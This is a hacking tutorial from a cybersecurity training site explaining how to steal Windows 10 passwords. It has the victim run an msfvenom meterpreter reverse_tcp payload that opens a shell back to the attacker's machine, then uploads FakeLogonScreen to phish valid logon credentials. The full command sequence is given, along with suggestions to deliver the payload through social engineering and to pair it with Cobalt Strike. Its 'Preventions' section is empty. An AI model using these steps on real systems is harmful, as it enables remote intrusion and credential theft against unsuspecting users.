This article demonstrates an in-depth guide on how to hack Windows 10 Passwords using FakeLogonScreen. Hacking Windows 10 password is an exciting topic and asked by many people on the group, so I decided to make this windows hacking tutorial.
I will use FakeLogonScreen and Kali Linux to hack Windows 10 passwords. FakelogonScreen is a handy and stealthy tool that creates a fake Log on-screen on a target machine running Windows 10. This tool enforces the target user to enter the correct credentials and, after getting it, passes it to the backdoor attacker.
Arris Huijgen developed this useful tool, it takes advantage of the normal behavior of the Windows environment, displaying the login screen when it comes out of sleep mode, and asking to enter credentials. At that time, this tool looked for phishing Windows credentials from the target, and the strength of this tool came in when it only accepts the valid credentials.
Now let’s try this tool and perform the exploit. We need to deploy two virtual machines i.e. Kali Linux and Windows 10. In my virtual lab environment, the Kali (attacking machine) has an IP: 192.168.0.103, and the Windows (target machine) got 192.168.0.100.
First, we need to download the FakeLogonScreen executable in our attacking machine from the link:
https://github.com/bitsadmin/fakelogonscreen/releases
Now assume the target machine is connected to the same network as the attacking machine.
We will create a malicious payload by using msfvenom tool according to the information acquired by the target system. We will set lhost to our Kali’s IP i.e. 192.168.0.103, and set lport as 4444. Since we are interested in exploiting a Windows system, we will generate a payload as an executable file to easily gets it executed on the target machine. Use command:
# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f exe >> payload.exe
Here the ‘payload.exe’ is the name of the generated payload. After that, we will run Python One-liner to create an HTTP server that will host this malicious payload at port 80 of the target machine.
#python -m SimpleHTTPServer 80
All set now, the most crucial stage came when we have to get the target to download this malicious payload. In real-life scenarios, an attacker can use different social engineering techniques and let the target user to download this malicious file into his system.
For practical demonstration, we will access our Kali’s machine directory from the Windows machine and download the payload.
This will also be showing the current logs in our Kali machine.
Let’s get straight back to Kali and launch Metasploit-framework.
Use multi/handler module.
Set the windows/meterpreter/reverse_tcp payload.
Set lhost as our IP i.e. 192.168.0.103 and lport as 4444
After configuring it all, just run the exploit, go back to the Windows machine and run the executable, i.e., ‘payload.exe’. This will quickly get us a meterpreter session.
Now upload the FakeLogonScreen executable that we downloaded earlier. Make sure to give it the correct path of the exe file.
>upload /root/Downloads/FakeLogonScreen.exe
After that, get the shell access and run FakeLogonScreen.exe as showing below:
And BOOM!! At the target machine, all the running windows would get closed, and the logon screen would pop up, asking the credentials and appears it as a legitimate window. The user would not hesitate for a second to enter his credentials and get his work back.
To check the strength of this tool, we will be entering the wrong password.
And this will show the error “The password is incorrect, try again.” This is the strength of FakeLogonScreen tool that enforces a target to enter his correct password. The user has no choice other than that to enter his password.
Let’s enter the correct password, and you will get your standard window as nothing happened before.
This also showing the FakeLogonScreen works similar to a keylogger. The attacker would easily monitor all the logs and could grab the correct password of the target user.
This tool could also work effectively on multiple desktop systems. While running it on various desktops, all the affected screens turn black immediately after executing the exploit from the attacking machine. This works even if the target user has set a customized background.
The zip file of the exploit also includes another executable named “FakeLogonScreenToFile.exe” that works the same as the previous executable. Still, it has some extra features i.e., not only showing the password but also stores it in a file %LOCALAPPDATA%\Microsoft\user.db.
This tool can also be integrated with Cobalt Strike to work effectively.
Preventions
Industrial Cybersecurity
September 28, 2023
Want always be up to date?
By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.
Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings
Gone are the days when phones were only used to make phone calls and send text messages; nowadays, smartphones are more akin to a pocket-sized
Can random characters in your code get you in trouble? They certainly can! Today, we are going to discuss CRLF injections and improper neutralization of
There is software available, like Metasploit, to gain remote access to any android phone. But other than that, we have the L3MON tool (A Cloud-based
Want always be up to date?
By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.
Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings
